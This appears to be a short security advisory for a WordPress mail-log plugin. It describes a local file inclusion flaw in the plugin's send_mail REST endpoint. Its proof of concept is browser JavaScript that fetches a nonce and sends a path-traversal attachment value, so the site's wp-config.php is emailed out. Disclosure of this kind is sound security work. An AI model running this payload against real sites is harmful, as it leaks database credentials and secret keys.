Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.
Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();
await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&[email protected]&includeAttachment={"../../wp-config.php":1}'})).text();